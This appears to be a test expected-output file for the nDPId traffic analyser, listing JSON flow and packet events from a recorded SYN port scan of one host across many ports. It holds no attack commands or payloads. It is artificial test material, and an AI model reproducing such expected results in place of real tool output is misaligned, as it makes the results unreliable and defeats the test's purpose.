+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsDW0AACkGEgasEAAIQA2GNIzTBrjdU4MZAAAAAGACCAAp1AAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs+D0AACgGKDWsEAAIQA2GNIzTH5DdU4MZAAAAAGACBAAU\/AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAscb8AACUGsbOsEAAIQA2GNIzTAG7dU4MZAAAAAGACCAAwHgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAs2D8AAC8GQTOsEAAIQA2GNIzTA+HdU4MZAAAAAGACEAAkqwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"synscan.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AAC8GAtSsEAAIQA2GNIzTBrvdU4MZAAAAAGACEAAh0QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs2rAAAC0GQMKsEAAIQA2GNIzTC+rdU4MZAAAAAGACCAAkogAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAs6RgAADsGJFqsEAAIQA2GNIzTAqvdU4MZAAAAAGACEAAl4QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsrkMAACgGci+sEAAIQA2GNIzTIB7dU4MZAAAAAGACBAAUbgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3MAACYGdv+sEAAIQA2GNIzTBYndU4MZAAAAAGACDAAnAwAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsZBoAADAGtFisEAAIQA2GNIzTAAbdU4MZAAAAAGACBAA0hgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdMAACkG\/Z+sEAAIQA2GNIzTB+7dU4MZAAAAAGACCAAongAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZYAADEG5dysEAAIQA2GNIzTBNHdU4MZAAAAAGACCAAruwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsFYYAADEGAe2sEAAIQA2GNIzTBpfdU4MZAAAAAGACCAAp9QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKYAADsGBM2sEAAIQA2GNIzTF3DdU4MZAAAAAGACEAARHAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsV0YAACkGyCysEAAIQA2GNIzTCK7dU4MZAAAAAGACCAAn3gAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsJAgAADIG8mqsEAAIQA2GNIzTFSbdU4MZAAAAAGACDAAXZgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAssoIAADUGYPCsEAAIQA2GNIzTA97dU4MZAAAAAGACCAAsrgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsjhQAACYGlF6sEAAIQA2GNIzTKX3dU4MZAAAAAGACDAADDwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAslV0AADoGeRWsEAAIQA2GNIzTCi3dU4MZAAAAAGACDAAiXwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsFwUAADIG\/22sEAAIQA2GNIzTKYXdU4MZAAAAAGACDAADBwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsnWIAACcGhBCsEAAIQA2GNIzTBCDdU4MZAAAAAGACEAAkbAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4GwAADsGLQasEAAIQA2GNIzSB\/bdUoMYAAAAAGACEAAgmQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsGQQAAC0GAm+sEAAIQA2GNIzSN57dUoMYAAAAAGACCAD48AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAspb4AACcGe7SsEAAIQA2GNIzSAgLdUoMYAAAAAGACEAAmjQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsFWEAADEGAhKsEAAIQA2GNIzSDyjdUoMYAAAAAGACCAAhZwAAAgQFtA=="} 